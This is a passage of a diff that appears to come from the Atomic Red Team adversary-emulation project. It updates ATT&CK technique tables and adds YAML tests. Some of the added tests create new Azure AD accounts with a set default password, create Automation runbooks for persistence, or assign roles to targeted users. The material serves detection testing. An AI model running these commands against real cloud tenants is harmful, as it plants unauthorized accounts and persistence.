+| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -39,7 +39,7 @@
 |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Escape to Host](../../T1611/T1611.md) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Cloud Service Discovery](../../T1526/T1526.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  | [Inter-Process Communication](../../T1559/T1559.md) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Network Service Scanning](../../T1046/T1046.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Software Discovery](../../T1518/T1518.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -24,7 +24,7 @@
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hide Artifacts](../../T1564/T1564.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Video Capture](../../T1125/T1125.md) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [Inter-Process Communication](../../T1559/T1559.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Process Discovery](../../T1057/T1057.md) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
 |  | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -27610,6 +27610,7 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
+      identifier: T1559
    atomic_tests: []
  T1204.003:
    technique:
@@ -36518,7 +36519,96 @@ persistence:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1136.003
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure AD - Create a new user
+      auto_generated_guid: e62d23ef-3153-4837-8625-fa4a3829134d
+      description: Creates a new user in Azure AD. Upon successful creation, a new
+        user will be created. Adversaries create new users so that their malicious
+        activity does not interrupt the normal functions of the compromised users
+        and can remain undetected for a long time.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Display name of the new user to be created in Azure AD
+          type: string
+          default: atomicredteam
+        userprincipalname:
+          description: User principal name (UPN) for the new Azure user being created
+            format email address
+          type: String
+          default: atomicredteam@yourdomain.com
+        password:
+          description: Password for the new Azure AD user being created
+          type: string
+          default: reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if AzureAD PowerShell module is installed
+        prereq_command: Get-InstalledModule -Name AzureAD
+        get_prereq_command: echo "use the following to install AzureAD PowerShell
+          module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery
+          -Force"
+      - description: Check if AzureAD PowerShell module is installed
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: "Connect-AzureAD\n$userprincipalname = \"#{userprincipalname}\"\n$username
+          = \"#{username}\"      \n$password = \"#{password}\"\n$PasswordProfile =
+          New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile\n$PasswordProfile.Password
+          = $password\nNew-AzureADUser -DisplayName $username -PasswordProfile $PasswordProfile
+          -UserPrincipalName $userprincipalname -AccountEnabled $true -MailNickName
+          $username      "
+        cleanup_command: Remove-AzureADUser -ObjectId "#{userprincipalname}"
+        name: powershell
+    - name: Azure AD - Create a new user via Azure CLI
+      auto_generated_guid: 228c7498-be31-48e9-83b7-9cb906504ec8
+      description: Creates a new user in Azure AD via the Azure CLI. Upon successful
+        creation, a new user will be created. Adversaries create new users so that
+        their malicious activity does not interrupt the normal functions of the compromised
+        users and can remain undetected for a long time.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Display name of the new user to be created in Azure AD
+          type: string
+          default: atomicredteam
+        userprincipalname:
+          description: User principal name (UPN) for the new Azure user being created
+            format email address
+          type: String
+          default: atomicredteam@yourdomain.com
+        password:
+          description: Password for the new Azure AD user being created
+          type: string
+          default: reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if Azure CLI is installed and install manually
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI manually
+          https://aka.ms/installazurecliwindows"
+      - description: Check if Azure CLI is installed and install via PowerShell
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference
+          = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows
+          -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I
+          AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+      - description: Update the userprincipalname to meet your requirements
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: "az login\n$userprincipalname = \"#{userprincipalname}\"\n$username
+          = \"#{username}\"      \n$password = \"#{password}\"\naz ad user create
+          --display-name $username --password $password --user-principal-name $userprincipalname\naz
+          ad user list --filter \"displayname eq 'atomicredteam'\"     "
+        cleanup_command: az ad user delete --id
+        name: powershell
  T1098:
    technique:
      x_mitre_platforms:
@@ -36622,7 +36712,8 @@ persistence:
          type: string
          default: p4sswd
        user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
          type: string
          default: SuperUser
        role_name:
@@ -36647,7 +36738,7 @@ persistence:
          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
          Connect-AzureAD -Credential $Credential

-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
          if ($user -eq $null) { Write-Warning "User not found"; exit }
          $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
          if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -36659,7 +36750,7 @@ persistence:
          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
          Connect-AzureAD -Credential $Credential -ErrorAction Ignore

-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
          if ($user -eq $null) { Write-Warning "User not found"; exit }
          $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
          if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -52046,6 +52137,7 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
    atomic_tests: []
  T1217:
    technique:
@@ -26845,11 +26845,6 @@ execution:
        '
      supported_platforms:
      - containers
-      input_arguments:
-        command:
-          description: Command to run
-          type: string
-          default: cat
      dependencies:
      - description: 'docker must be installed

@@ -27865,6 +27860,7 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
+      identifier: T1559
    atomic_tests: []
  T1204.003:
    technique:
@@ -51766,6 +51762,7 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
    atomic_tests: []
  T1217:
    technique:
@@ -27522,6 +27522,7 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
+      identifier: T1559
    atomic_tests: []
  T1204.003:
    technique:
@@ -51312,6 +51313,7 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
    atomic_tests: []
  T1217:
    technique:
@@ -27418,6 +27418,7 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
+      identifier: T1559
    atomic_tests: []
  T1204.003:
    technique:
@@ -51156,6 +51157,7 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
    atomic_tests: []
  T1217:
    technique:
@@ -27561,6 +27561,7 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
+      identifier: T1559
    atomic_tests: []
  T1204.003:
    technique:
@@ -51468,6 +51469,7 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
    atomic_tests: []
  T1217:
    technique:
@@ -14090,7 +14090,56 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1078.004
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
  T1480.001:
    technique:
      x_mitre_platforms:
@@ -24323,7 +24372,56 @@ privilege-escalation:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1078.004
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
  T1053.002:
    technique:
      x_mitre_platforms:
@@ -27498,6 +27596,7 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
+      identifier: T1559
    atomic_tests: []
  T1204.003:
    technique:
@@ -36345,7 +36444,8 @@ persistence:
          type: string
          default: p4sswd
        user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
          type: string
          default: SuperUser
        role_name:
@@ -36374,7 +36474,7 @@ persistence:
          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
          Connect-AzAccount -Credential $Credential

-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
          if ($user -eq $null) { Write-Warning "User not found"; exit }
          $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
          if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -36389,7 +36489,7 @@ persistence:
          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
          Connect-AzAccount -Credential $Credential -ErrorAction Ignore

-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
          if ($user -eq $null) { Write-Warning "User not found"; exit }
          $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
          if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -39931,7 +40031,56 @@ persistence:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1078.004
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
